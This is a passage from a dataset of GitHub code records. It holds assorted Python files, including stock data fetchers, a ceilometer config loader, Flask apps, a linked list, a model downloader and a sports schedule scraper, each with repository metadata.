main()\n","repo_name":"DonghyunSung-MS/rl_algorithms","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"4327282329","text":"def fact(n):\n    if (n < 2):\n        return (1)\n    return (n * fact(n - 1))\n    \ni = 3\ntotal = 0\n\n\nwhile (i < 1000000):\n    tmp = i\n    sum = 0\n    while (tmp != 0):\n        sum += fact(tmp % 10)\n        tmp //= 10\n    if (sum == i):\n        total += i\n    i += 1\n\nprint(total)\n","repo_name":"jchung05/ProjectEuler","sub_path":"Python/034.py","file_name":"034.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"8006422315","text":"# -*- coding: utf-8 -*-\n\nfrom django.core.management.base import BaseCommand\nfrom django.conf import settings\nfrom datetime import datetime\nfrom dateutil.relativedelta import relativedelta\nfrom apps.source.models import Stock\nfrom apps.source.models import StockDailyData\nfrom apps.source.models import TradeCalendar\nimport tushare as ts\nimport threading\nimport math\nimport time\nimport logging\n\n\nclass Command(BaseCommand):\n    help = 'Fetch daily stock data'\n    thread_num = 10  # number of worker threads\n    all = False  # whether to fetch the full history\n    start_at = None  # start date passed on the command line\n    end_at = None  # end date passed on the command line\n    api_times_pm = 500  # API request limit per minute\n    thread_api_freq = 0  # how often each thread may call the API\n    stocks = []  # stock codes passed on the command line\n    stock_objs = []  # collection of stocks to process\n    last_date = ''  # default cut-off date when fetching from the API\n    last_trade_date = ''  # the previous trading day\n\n    def __init__(self):\n        self.logger = logging.getLogger('log')\n        ts.set_token(settings.TUSHARE_API_TOKEN)\n\n    def add_arguments(self, parser):\n        # Named (optional) arguments\n        parser.add_argument('--all', action='store_true', dest='all', help='fetch the full history')\n        parser.add_argument('--stocks', dest='stocks', help='fetch data for specific stocks')\n        parser.add_argument('--start', dest='start_at', help='start date')\n        parser.add_argument('--end', dest='end_at', help='end date')\n        parser.add_argument('--tn', dest='thread_num', help='number of threads', type=int)\n\n    def handle(self, *args, **options):\n        self.log('[' + datetime.now().strftime('%Y-%m-%d %H:%M:%S') + '] daily stock data script started:')\n        # initialise script parameters\n        self.init_params(args=args, options=options)\n        try:\n            # query the stocks matching the filters\n            query = Stock.objects\n            if self.stocks:\n                query = query.filter(ts_code__in=self.stocks)\n            stocks = query.all()\n            self.stock_objs = list(stocks)\n            # pull data with multiple threads\n            thread_list = []\n            for i in range(self.thread_num):\n                t = threading.Thread(target=self.cycle_get_queue)\n                thread_list.append(t)\n            for t in thread_list:\n                t.setDaemon(True)\n                t.start()\n            for t in thread_list:\n                t.join()\n        except Exception as e:\n            self.log('[Exception]' + str(e))\n        self.log('[' + datetime.now().strftime('%Y-%m-%d %H:%M:%S') + '] daily stock data script finished.')\n\n    def cycle_get_queue(self):\n        while self.stock_objs:\n            stock = self.stock_objs.pop(0)\n            if stock:\n                self.handle_one_stock(stock)\n            else:\n                return\n\n    def handle_one_stock(self, stock):\n        \"\"\"\n        Handle one stock\n        :param stock:\n        :return:\n        \"\"\"\n        # fetch the full history\n        if self.all:\n            return self.get_stock_all_data(stock)\n        # fetch the previous trading day's row to decide whether a full pull is needed\n        try:\n            stock_last_trade = StockDailyData.objects.filter(ts_code=stock.ts_code,\n                                                             trade_date=self.last_trade_date).get()\n        except StockDailyData.DoesNotExist:\n            return self.get_stock_all_data(stock)\n\n        data = ts.pro_bar(ts_code=stock.ts_code, adj='qfq', start_date=self.last_trade_date,\n                          end_date=self.last_trade_date)\n        if float(stock_last_trade.close) != data.loc[0]['close']:\n            print('previous trading day data in the database does not match the API')\n            return self.get_stock_all_data(stock)\n        # if start/end were passed, fetch that interval; otherwise fetch from the previous trading day to the cut-off date\n        start_at = self.last_trade_date\n        if self.start_at:\n            start_at = self.start_at\n        end_at = self.last_date\n        if self.end_at:\n            end_at = self.end_at\n        print('[' + stock.ts_code + ']' + stock.name + '[' + start_at + '~' + end_at + ']')\n        self.get_stock_data(stock=stock, start_date=start_at, end_date=end_at)\n\n    def get_stock_all_data(self, stock):\n        start_at = stock.list_date\n        end_at = self.last_date\n        print('[' + stock.ts_code + ']' + stock.name + ', pulling full history [' + start_at + '~' + end_at + ']')\n        self.get_stock_data(stock=stock, start_date=start_at, end_date=end_at)\n\n    def get_stock_data(self, stock, start_date, end_date):\n        \"\"\"\n        Fetch stock data: at most 5000 rows per call, at most 500 requests per minute\n        :param stock: stock model instance\n        :param start_date: start date, format Ymd, e.g. 19991118\n        :param end_date: end date, format Ymd, e.g. 19991118\n        :return:\n        \"\"\"\n        try:\n            # loop over the start..end range in 20-year windows\n            start_obj = datetime.strptime(start_date, '%Y%m%d')\n            end_obj = datetime.strptime(end_date, '%Y%m%d')\n            while start_obj <= end_obj:\n                while_start_at = datetime.now()\n                after_20_years = start_obj + relativedelta(years=20)\n                if after_20_years < end_obj:\n                    print('[' + stock.ts_code + ']' + stock.name + '[' + start_obj.strftime(\n                        '%Y%m%d') + '~' + after_20_years.strftime(\n                        '%Y%m%d') + ']')\n                    data = ts.pro_bar(ts_code=stock.ts_code, adj='qfq', start_date=start_obj.strftime('%Y%m%d'),\n                                      end_date=after_20_years.strftime('%Y%m%d'))\n                    start_obj = after_20_years + relativedelta(days=1)\n                else:\n                    print('[' + stock.ts_code + ']' + stock.name + '[' + start_obj.strftime(\n                        '%Y%m%d') + '~' + end_obj.strftime(\n                        '%Y%m%d') + ']')\n                    data = ts.pro_bar(ts_code=stock.ts_code, adj='qfq', start_date=start_obj.strftime('%Y%m%d'),\n                                      end_date=end_obj.strftime('%Y%m%d'))\n                    start_obj = end_obj + relativedelta(days=1)\n                # write the rows into the database\n                if data is None:\n                    print(\"data is None\")\n                    continue\n                for index, item in data.iterrows():\n                    # replace NaNs with 0.00 before saving\n                    for col in ('open', 'high', 'low', 'close', 'pre_close',\n                                'change', 'pct_chg', 'vol', 'amount'):\n                        if math.isnan(item[col]):\n                            item[col] = 0.00\n                    StockDailyData.objects.update_or_create(defaults=dict(item), ts_code=item['ts_code'],\n                                                            trade_date=item['trade_date'])\n                time_interval = (datetime.now() - while_start_at).seconds + 1\n                if time_interval < self.thread_api_freq:\n                    diff = self.thread_api_freq - time_interval\n                    print('loop took', time_interval, 's, below the rate limit of', self.thread_api_freq, 's; sleeping', diff, 's')\n                    time.sleep(diff)\n        except IOError:\n            self.log(\"rate limited; sleeping 10 seconds before retrying\")\n            time.sleep(10)\n            self.get_stock_data(stock=stock, start_date=start_date, end_date=end_date)\n\n    def init_params(self, args, options):\n        if options['thread_num']:\n            self.thread_num = options['thread_num']\n        self.all = options['all']\n        if options['stocks']:\n            self.stocks = options['stocks'].split(',')\n        if options['start_at']:\n            self.start_at = options['start_at']\n        if options['end_at']:\n            self.end_at = options['end_at']\n        # compute the cut-off date\n        today = datetime.now().strftime('%Y%m%d')\n        if datetime.now() >= datetime.strptime(today + ' 17:00:00', '%Y%m%d %H:%M:%S'):\n            self.last_date = datetime.now().strftime('%Y%m%d')\n        else:\n            yesterday = datetime.now() - relativedelta(days=1)\n            self.last_date = yesterday.strftime('%Y%m%d')\n\n        trade_calendar = TradeCalendar.objects.filter(exchange='SSE', cal_date=today).get()\n        if not trade_calendar:\n            raise Exception(\"failed to fetch today's trade calendar\")\n        self.last_trade_date = trade_calendar.pretrade_date\n        # compute how often each thread may call the API\n        thread_times_pm = math.floor(self.api_times_pm / self.thread_num)\n        self.thread_api_freq = math.ceil(60 / thread_times_pm)\n\n    def log(self, msg):\n        print(msg)\n        self.logger.info(msg)\n","repo_name":"gentlemanwuyu/stock","sub_path":"apps/source/management/commands/GetStockDailyData.py","file_name":"GetStockDailyData.py","file_ext":"py","file_size_in_byte":9425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"17672845858","text":"# coding=utf-8\n# Stock auto-trading assistant - example of automated order placement in Python\n# Put this script together with StockOrderApi.py and Order.dll in the same directory as your own script\nimport log\nfrom StockOrderApi import *\n\n# buy test\n#Buy(u\"600000\" , 100, 0, 1, 0)\n\n# sell test - only acts if the stock is actually held\n# Sell(u\"000042\" , 501, 0, 1, 0)\n\n# account info\nlog.log(\"Stock auto-trading API test\")\nlog.log(\"Account info\")\nlog.log(\"--------------------------------\")\n\narrAccountInfo = [\"Total assets\", \"Available funds\", \"Position market value\", \"Total profit\", \"Position count\"];\nfor i in range(0, len(arrAccountInfo)):\n    value = GetAccountInfo( u\"\" , i, 0)\n    log.log (\"%s %f \"%(arrAccountInfo[i], value))\n\nlog.log(\"--------------------------------\")\nlog.log(\" \")\n\nlog.log(\"Stock positions\")\nlog.log(\"--------------------------------\")\n# get all held stock codes; the result is a ','-separated string\nallStockCode = GetAllPositionCode(0)\nallStockCodeArray = allStockCode.split(',')\nfor i in range(0, len(allStockCodeArray)):\n    vol = GetPosInfo( allStockCodeArray[i] , 0 , 0)\n    changeP = GetPosInfo( allStockCodeArray[i] , 4 , 0)\n    log.log (\"%s %d %.2f%%\"%(allStockCodeArray[i], vol, changeP))\n\nlog.log(\"--------------------------------\")\n\nlog.log(\"Cancellable buy orders\")\nlog.log(\"--------------------------------\")\nallStockCode = GetAllOrderCode(0,1)\nallStockCodeArray = allStockCode.split(',')\nfor i in range(0, len(allStockCodeArray)):\n    vol = GetOrderInfo( allStockCodeArray[i] , 0 , 0, 0)\n    seconds = GetOrderInfo( allStockCodeArray[i] , 0 , 1, 0)\n    log.log (\"%s %d %d\"%(allStockCodeArray[i], vol, seconds))\n\nlog.log(\"--------------------------------\")\n\nlog.log(\"Cancellable sell orders\")\nlog.log(\"--------------------------------\")\nallStockCode = GetAllOrderCode(0,2)\nallStockCodeArray = allStockCode.split(',')\nfor i in range(0, len(allStockCodeArray)):\n    vol = GetOrderInfo( allStockCodeArray[i] , 1 , 0, 0)\n    seconds = GetOrderInfo( allStockCodeArray[i] , 1 , 1, 0)\n    log.log (\"%s %d %d\"%(allStockCodeArray[i], vol, seconds))\n\nlog.log(\"--------------------------------\")\n\n# cancel a buy order\n# CancelOrder(\"600036\", 1, 0);\n# cancel a sell order\n# CancelOrder(\"000042\", 2, 0);\n","repo_name":"ImmortalHalfWu/StockOrder","sub_path":"StockOrder.py","file_name":"StockOrder.py","file_ext":"py","file_size_in_byte":2096,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"}
+{"seq_id":"7696219412","text":"#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n#      http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
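# GetStockDailyData.py above splits a 500-requests/minute API quota across its
# worker threads. The budget arithmetic on its own (numbers follow the
# script's defaults; purely illustrative):
import math

api_times_pm = 500  # quota: API calls allowed per minute
for threads in (1, 5, 10):
    per_thread_pm = math.floor(api_times_pm / threads)  # calls each thread may make
    min_loop_seconds = math.ceil(60 / per_thread_pm)    # minimum seconds per call
    print(threads, per_thread_pm, min_loop_seconds)
# With 10 threads each gets 50 calls/min, so a thread must spend >= 2s per loop.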
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport os\n\nfrom jsonpath_rw_ext import parser\nfrom oslo_log import log\nimport yaml\n\nfrom ceilometer.i18n import _\n\nLOG = log.getLogger(__name__)\n\n\nclass DefinitionException(Exception):\n def __init__(self, message, definition_cfg=None):\n msg = '%s %s: %s' % (self.__class__.__name__, definition_cfg, message)\n super(DefinitionException, self).__init__(msg)\n self.brief_message = message\n\n\nclass MeterDefinitionException(DefinitionException):\n pass\n\n\nclass EventDefinitionException(DefinitionException):\n pass\n\n\nclass ResourceDefinitionException(DefinitionException):\n pass\n\n\nclass DynamicPollsterException(DefinitionException):\n pass\n\n\nclass DynamicPollsterDefinitionException(DynamicPollsterException):\n pass\n\n\nclass InvalidResponseTypeException(DynamicPollsterException):\n pass\n\n\nclass NonOpenStackApisDynamicPollsterException\\\n (DynamicPollsterDefinitionException):\n pass\n\n\nclass Definition(object):\n JSONPATH_RW_PARSER = parser.ExtentedJsonPathParser()\n GETTERS_CACHE = {}\n\n def __init__(self, name, cfg, plugin_manager):\n self.cfg = cfg\n self.name = name\n self.plugin = None\n if isinstance(cfg, dict):\n if 'fields' not in cfg:\n raise DefinitionException(\n _(\"The field 'fields' is required for %s\") % name,\n self.cfg)\n\n if 'plugin' in cfg:\n plugin_cfg = cfg['plugin']\n if isinstance(plugin_cfg, str):\n plugin_name = plugin_cfg\n plugin_params = {}\n else:\n try:\n plugin_name = plugin_cfg['name']\n except KeyError:\n raise DefinitionException(\n _('Plugin specified, but no plugin name supplied '\n 'for %s') % name, self.cfg)\n plugin_params = plugin_cfg.get('parameters')\n if plugin_params is None:\n plugin_params = {}\n try:\n plugin_ext = plugin_manager[plugin_name]\n except KeyError:\n raise DefinitionException(\n _('No plugin named %(plugin)s available for '\n '%(name)s') % dict(\n plugin=plugin_name,\n name=name), self.cfg)\n plugin_class = plugin_ext.plugin\n self.plugin = plugin_class(**plugin_params)\n\n fields = cfg['fields']\n else:\n # Simple definition \"foobar: jsonpath\"\n fields = cfg\n\n if isinstance(fields, list):\n # NOTE(mdragon): if not a string, we assume a list.\n if len(fields) == 1:\n fields = fields[0]\n else:\n fields = '|'.join('(%s)' % path for path in fields)\n\n if isinstance(fields, int):\n self.getter = fields\n else:\n try:\n self.getter = self.make_getter(fields)\n except Exception as e:\n raise DefinitionException(\n _(\"Parse error in JSONPath specification \"\n \"'%(jsonpath)s' for %(name)s: %(err)s\")\n % dict(jsonpath=fields, name=name, err=e), self.cfg)\n\n def _get_path(self, match):\n if match.context is not None:\n for path_element in self._get_path(match.context):\n yield path_element\n yield str(match.path)\n\n def parse(self, obj, return_all_values=False):\n if callable(self.getter):\n values = self.getter(obj)\n else:\n return self.getter\n\n values = [match for match in values\n if return_all_values or match.value is not None]\n\n if self.plugin is not None:\n if return_all_values and not self.plugin.support_return_all_values:\n raise DefinitionException(\"Plugin %s don't allows to \"\n \"return multiple values\" %\n self.cfg[\"plugin\"][\"name\"], self.cfg)\n values_map = [('.'.join(self._get_path(match)), match.value) for\n match in values]\n values = [v for v in self.plugin.trait_values(values_map)\n if v is not None]\n else:\n values = [match.value for match in values if match is not 
None]\n        if return_all_values:\n            return values\n        else:\n            return values[0] if values else None\n\n    def make_getter(self, fields):\n        if fields in self.GETTERS_CACHE:\n            return self.GETTERS_CACHE[fields]\n        else:\n            getter = self.JSONPATH_RW_PARSER.parse(fields).find\n            self.GETTERS_CACHE[fields] = getter\n            return getter\n\n\ndef load_definitions(conf, defaults, config_file, fallback_file=None):\n    \"\"\"Set up definitions from a yaml config file.\"\"\"\n\n    if not os.path.exists(config_file):\n        config_file = conf.find_file(config_file)\n    if not config_file and fallback_file is not None:\n        LOG.debug(\"No Definitions configuration file found! \"\n                  \"Using default config.\")\n        config_file = fallback_file\n\n    if config_file is not None:\n        LOG.debug(\"Loading definitions configuration file: %s\", config_file)\n\n        with open(config_file) as cf:\n            config = cf.read()\n\n        try:\n            definition_cfg = yaml.safe_load(config)\n        except yaml.YAMLError as err:\n            if hasattr(err, 'problem_mark'):\n                mark = err.problem_mark\n                errmsg = (_(\"Invalid YAML syntax in Definitions file \"\n                            \"%(file)s at line: %(line)s, column: %(column)s.\")\n                          % dict(file=config_file,\n                                 line=mark.line + 1,\n                                 column=mark.column + 1))\n            else:\n                errmsg = (_(\"YAML error reading Definitions file \"\n                            \"%(file)s\")\n                          % dict(file=config_file))\n            LOG.error(errmsg)\n            raise\n\n    else:\n        LOG.debug(\"No Definitions configuration file found! \"\n                  \"Using default config.\")\n        definition_cfg = defaults\n\n    LOG.debug(\"Definitions: %s\", definition_cfg)\n    return definition_cfg\n","repo_name":"openstack/ceilometer","sub_path":"ceilometer/declarative.py","file_name":"declarative.py","file_ext":"py","file_size_in_byte":6996,"program_lang":"python","lang":"en","doc_type":"code","stars":310,"dataset":"github-code","pt":"2"}
+{"seq_id":"5150825831","text":"from flask import Flask, request, render_template, make_response\nfrom API import weather\n\n\napp = Flask(__name__) \n#daily_weather = [0, 0, 0, -1, -2, -1, 1, 1, 3, 5, 6, 6, 6, 9, 10, 10, 8, 7, 5, 3, 0, 0, -1, -2] # Celsius\n\n@app.route(\"/\", methods = [\"GET\", \"POST\"])\ndef index():\n    # fall back to the cookie when no city was passed as a query parameter\n    city = request.args.get(\"userCity\") or request.cookies.get(\"city\")\n    print(city)\n    daily_weather = weather.get_weather(city=city)\n    response = make_response(render_template(\"weather.html\", enumerate=enumerate, weather=daily_weather))\n    if city:\n        response.set_cookie(\"city\", city)\n    return response\n\n@app.route(\"/cookie\")\ndef cookie():\n    response = make_response(\"Cookie\") \n    response.set_cookie(\"robotCookie\", \"This is one test of cookie\", max_age = 60*60*24)\n    return response\n\n@app.route(\"/check_cookie\")\ndef check_cookie():\n    if request.cookies.get(\"robotCookie\"):\n        response = make_response(f\"Your cookie {request.cookies.get('robotCookie')}🍪\")\n    else:\n        response = \"0\"\n    return response\n\n\n\n\naddr = \"127.0.0.1\"\napp.run(host=addr, port=80, debug=True)","repo_name":"AlanaKokoeva/Weather-Site","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"4739659331","text":"class Node:\n    def __init__(self, value, next=None):\n        self.value = value\n        self.next = next\n\nclass LinkedList:\n\n    def __init__(self, next=None):\n        self.head = None\n        self.next = next\n\n    def insert(self, value):\n        self.head = 
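# declarative.py above memoises compiled JSONPath getters in a class-level
# dict (GETTERS_CACHE). The same idea expressed with functools on a simulated
# "expensive" compile step (names below are illustrative):
import functools

@functools.lru_cache(maxsize=None)
def make_getter(field):
    print("compiling", field)          # runs once per distinct expression
    return lambda obj: obj.get(field)

g1 = make_getter("name")
g2 = make_getter("name")               # cache hit; no second "compiling" line
print(g1 is g2, g1({"name": "x"}))     # True x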
Node(value, self.head)\n\n    def append(self, value):\n        current = self.head\n        if current:\n            while current.next is not None:\n                current = current.next\n            current.next = Node(value)\n        else:\n            self.head = Node(value, self.head)\n\n    def insert_before(self, value, position):\n        new = Node(value)\n        pointer = self.head\n        counter = 1\n        if position == 0:\n            new.next = self.head\n            self.head = new\n            return self.head\n        while pointer.next is not None:\n            if counter == position:\n                new.next = pointer.next\n                pointer.next = new\n                break\n            counter += 1\n            pointer = pointer.next\n        return self.head\n\n    def insert_after(self, value, position):\n        new = Node(value)  # Node requires a value; the bare Node() call raised TypeError\n        pointer = self.head\n        counter = 1\n        if position == 0:\n            new.next = self.head\n            self.head = new\n            return self.head\n        while pointer.next is not None:\n            if counter == position:\n                new.next = pointer.next\n                pointer.next = new\n                break\n            counter += 1\n            pointer = pointer.next\n        return self.head\n\n    def __str__(self):\n        current = self.head\n        output = \"\"\n\n        while current:\n            output += \"{ \" + current.value + \" } -> \"\n            current = current.next\n\n        output += \"NULL\"\n        return output\n\n    def kth_from_end(self, k):\n        if k < 0:\n            raise ValueError\n\n        # two runners k nodes apart, so the list is not destroyed\n        lead = self.head\n        for _ in range(k):\n            if lead.next is None:\n                raise ValueError\n            lead = lead.next\n\n        trail = self.head\n        while lead.next is not None:\n            lead = lead.next\n            trail = trail.next\n\n        return trail.value\n\n    def merge_list(self, a, b):\n        a_curr = a.head\n        b_curr = b.head\n\n        while a_curr and b_curr:\n\n            a_next = a_curr.next\n            a_curr.next = b_curr\n            a_curr = a_next\n\n            b_next = b_curr.next\n            b_curr.next = a_curr\n            b_curr = b_next\n\n            if a_curr and a_curr.next is None:\n                a_curr.next = b_curr\n                return a\n        return a\n","repo_name":"KSTOV/data-structures-and-algorithms","sub_path":"python/code_challenges/link_list_insertions/linked_list.py","file_name":"linked_list.py","file_ext":"py","file_size_in_byte":2511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"71281657328","text":"import os\nimport requests\nimport bz2, shutil\nimport numpy as np\n\ndef download_dlib_model():\n    # NOTE: print_orderly is not defined in this file; it must be supplied by the importing module\n    print_orderly(\"Get dlib model\", 60)\n    dlib_model_link = \"http://dlib.net/files/shape_predictor_68_face_landmarks.dat.bz2\"\n    print(\"Downloading dlib model...\")\n    with requests.get(dlib_model_link, stream=True) as r:\n        print(\"Zip file size: \", np.round(len(r.content) / 1024 / 1024, 2), \"MB\")\n        destination = (\n            \"dlib_models\" + os.path.sep + \"shape_predictor_68_face_landmarks.dat.bz2\"\n        )\n        if not os.path.exists(destination.rsplit(os.path.sep, 1)[0]):\n            os.mkdir(destination.rsplit(os.path.sep, 1)[0])\n        print(\"Saving dlib model...\")\n        with open(destination, \"wb\") as fd:\n            for chunk in r.iter_content(chunk_size=32678):\n                fd.write(chunk)\n        print(\"Extracting dlib model...\")\n        with bz2.BZ2File(destination) as fr, open(\n            \"dlib_models/shape_predictor_68_face_landmarks.dat\", \"wb\"\n        ) as fw:\n            shutil.copyfileobj(fr, fw)\n        print(\"Saved: \", destination)\n    print_orderly(\"done\", 60)\n\n    os.remove(destination)\n","repo_name":"v-datnvt2/Driver-Drowsiness-Behavior","sub_path":"FaceDetector/shape_predictor/download_dlib_model.py","file_name":"download_dlib_model.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"5409724881","text":"import os\n\nimport utils.io as io\n\n\ndef prepare_hico(exp_const,data_const):\n    io.mkdir_if_not_exists(exp_const.exp_dir)\n    \n    print('Writing constants to exp dir ...')\n    data_const_json = 
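# download_dlib_model.py above streams the .bz2 archive through
# shutil.copyfileobj rather than decompressing it in memory. The same pattern,
# runnable end-to-end on an in-memory stand-in file:
import bz2
import io
import shutil

payload = b"landmark model bytes" * 3
compressed = io.BytesIO(bz2.compress(payload))
restored = io.BytesIO()
with bz2.open(compressed) as fr:
    shutil.copyfileobj(fr, restored)    # copies in chunks, not all at once
print(restored.getvalue() == payload)   # True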
os.path.join(exp_const.exp_dir,'data_const.json')\n data_const.to_json(data_const_json)\n\n exp_const_json = os.path.join(exp_const.exp_dir,'exp_const.json')\n exp_const.to_json(exp_const_json)\n\n print('Loading anno_list.json ...')\n anno_list = io.load_json_object(data_const.anno_list_json)\n \n print('Creating input json for faster rcnn ...')\n images_in_out = [None]*len(anno_list)\n for i, anno in enumerate(anno_list):\n global_id = anno['global_id']\n image_in_out = dict()\n image_in_out['in_path'] = os.path.join(\n data_const.images_dir,\n anno['image_path_postfix'])\n image_in_out['out_dir'] = os.path.join(\n data_const.proc_dir,\n 'faster_rcnn_boxes')\n image_in_out['prefix'] = f'{global_id}_'\n images_in_out[i] = image_in_out\n\n images_in_out_json = os.path.join(\n exp_const.exp_dir,\n 'faster_rcnn_im_in_out.json')\n io.dump_json_object(images_in_out,images_in_out_json)\n\n\n","repo_name":"BigRedT/no_frills_hoi_det","sub_path":"exp/detect_coco_objects/prepare_data_for_faster_rcnn.py","file_name":"prepare_data_for_faster_rcnn.py","file_ext":"py","file_size_in_byte":1197,"program_lang":"python","lang":"en","doc_type":"code","stars":60,"dataset":"github-code","pt":"2"} +{"seq_id":"72726206445","text":"\"\"\"Collect raw time schedules from atletiek.nu.\"\"\"\n\n\nimport sqlite3\n\nfrom tfcompetition.competition_selector import CompetitionSelector\nfrom tfcompetition.tfcompetition import TFCompetition\nfrom tfcompetition.schedule.schedule_parser import ScheduleParser\n\n\ndef main():\n \"\"\"Collect schedule tables to investigate the contents.\"\"\"\n # Make sure that base tables exist.\n conn = sqlite3.connect('raw_schedule.db')\n curs = conn.cursor()\n curs.execute(\n '''\n CREATE TABLE if not exists competitions (\n comp_id INTEGER,\n comp_name TEXT\n );\n ''')\n curs.execute(\n '''\n CREATE TABLE if not exists schedules (\n comp_id INTEGER,\n start_time TEXT,\n time_link TEXT,\n start_group TEXT,\n group_link TEXT,\n event TEXT,\n event_link TEXT,\n final_column TEXT,\n final_link TEXT\n );\n ''')\n # Select competitions.\n while True:\n # Let the user choose a competition.\n sel = CompetitionSelector(initialise=False)\n sel.select('Choose a competition (Enter to stop)')\n if sel.competition <= 0:\n print('Stopping collection of competitions.')\n conn.commit()\n conn.close()\n return\n # Show the name of the competition.\n competition = TFCompetition(sel.competition)\n parser = ScheduleParser(competition.schedule_url)\n if not parser.tree:\n continue\n print('{}: {}'.format(sel.competition, parser.name))\n # Insert or Update into the competition tables\n\n def row_generator():\n table = None\n try:\n table = parser.get_table()\n except IndexError:\n return\n for row in table.body.rows:\n yield(\n int(sel.competition),\n row.cells[0].string, row.cells[0].link,\n row.cells[1].string, row.cells[1].link,\n row.cells[2].string, row.cells[2].link,\n row.cells[3].string, row.cells[3].link\n )\n\n curs.execute(\n '''\n SELECT comp_id FROM competitions\n WHERE comp_id = ?;\n ''',\n (int(sel.competition),))\n if curs.fetchone():\n print('Updating competition ...')\n curs.execute(\n '''\n UPDATE competitions\n SET comp_name = ?\n WHERE comp_id = ?;\n ''',\n (parser.name, int(sel.competition)))\n curs.execute(\n '''\n DELETE FROM schedules\n WHERE comp_id = ?\n ''',\n (int(sel.competition),))\n curs.executemany(\n '''\n INSERT INTO schedules (\n comp_id, start_time, time_link,\n start_group, group_link, event,\n event_link, final_column, final_link)\n VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?)\n 
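# --- Illustrative sketch (not part of the repos above) ---
# The schedule collector above emulates an upsert with SELECT + UPDATE/INSERT.
# On SQLite >= 3.24 the same intent can be expressed atomically with
# INSERT ... ON CONFLICT, assuming comp_id is declared as the primary key:
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE competitions (comp_id INTEGER PRIMARY KEY, comp_name TEXT)")
conn.execute(
    """
    INSERT INTO competitions (comp_id, comp_name) VALUES (?, ?)
    ON CONFLICT(comp_id) DO UPDATE SET comp_name = excluded.comp_name
    """,
    (42, "Demo meet"),
)
conn.commit()
print(conn.execute("SELECT * FROM competitions").fetchall())  # [(42, 'Demo meet')]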
''',\n row_generator())\n else:\n print('Inserting competition ...')\n curs.execute(\n '''\n INSERT INTO competitions (comp_id, comp_name)\n VALUES (?, ?)\n ''',\n (int(sel.competition), parser.name))\n curs.executemany(\n '''\n INSERT INTO schedules (\n comp_id, start_time, time_link,\n start_group, group_link, event,\n event_link, final_column, final_link)\n VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?)\n ''',\n row_generator())\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"PeterPesch/track-and-field-competition","sub_path":"collect_raw_schedules.py","file_name":"collect_raw_schedules.py","file_ext":"py","file_size_in_byte":4049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"31066223866","text":"import json\nimport os\nimport uuid\n\nfrom flask import request\nfrom flask import jsonify\nfrom datetime import datetime\n\nfrom utils import initialize_logger\n\nlogger = initialize_logger('controller.py')\n\n\ndef load_doctors_data():\n return json.load(open(os.getenv('DOCTORS_DATA_FILE'), ))\n\n\ndef load_appointments_data():\n return json.load(open(os.getenv('APPOINTMENTS_DATA_FILE'), ))\n\n\ndef update_doctors_data(doctors):\n with open(os.getenv('DOCTORS_DATA_FILE'), 'w') as f:\n json.dump(doctors, f)\n\n\ndef update_appointments_data(appointments):\n with open(os.getenv('APPOINTMENTS_DATA_FILE'), 'w') as f:\n json.dump(appointments, f)\n\n\ndef is_number(number):\n try:\n float(number)\n return True\n except ValueError:\n return False\n\n\ndef get_doctors():\n return jsonify(load_doctors_data()), 200\n\n\ndef get_appointments():\n body = request.args\n if any(key not in body for key in ['doctor id', 'time']):\n return 'invalid request, missing data', 422\n\n doctor_id, time = body.get('doctor id'), body.get('time')\n\n if not is_number(time):\n return 'invalid time', 422\n\n if doctor_id not in [doctor['id'] for doctor in load_doctors_data()]:\n return 'invalid doctor id', 422\n\n result_appointments = []\n target_date = datetime.fromtimestamp(float(time)).date()\n for appointment in load_appointments_data():\n curr_appointment_date = datetime.fromtimestamp(float(appointment['time'])).date()\n if target_date == curr_appointment_date:\n result_appointments.append(appointment)\n return jsonify(result_appointments), 200\n\n\ndef delete_appointment():\n body = request.form\n if 'appointment id' not in body:\n return 'invalid request, missing appointment id', 422\n appointments = load_appointments_data()\n remaining_appointments = [appointment for appointment in appointments if\n appointment['id'] != body.get('appointment id')]\n if len(appointments) != len(remaining_appointments):\n update_appointments_data(remaining_appointments)\n return 'deleted', 200\n return 'appointment not found', 200\n\n\ndef book_appointment():\n body = request.form\n if any(key not in body for key in ['first name', 'last name', 'time', 'kind', 'doctor id']):\n return 'invalid appointment, missing data', 422\n\n first_name, last_name, time, kind, doctor_id = body.get('first name'), body.get('last name'), body.get(\n 'time'), body.get('kind'), body.get('doctor id')\n\n if not is_number(time):\n return 'invalid time', 422\n if kind not in ['New Patient', 'Follow-up']:\n return 'invalid appointment kind', 422\n if doctor_id not in [doctor['id'] for doctor in load_doctors_data()]:\n return 'invalid doctor id', 422\n\n time_object = datetime.fromtimestamp(float(time))\n if time_object.minute % 15 != 0 or time_object.second != 0 or time_object.microsecond != 
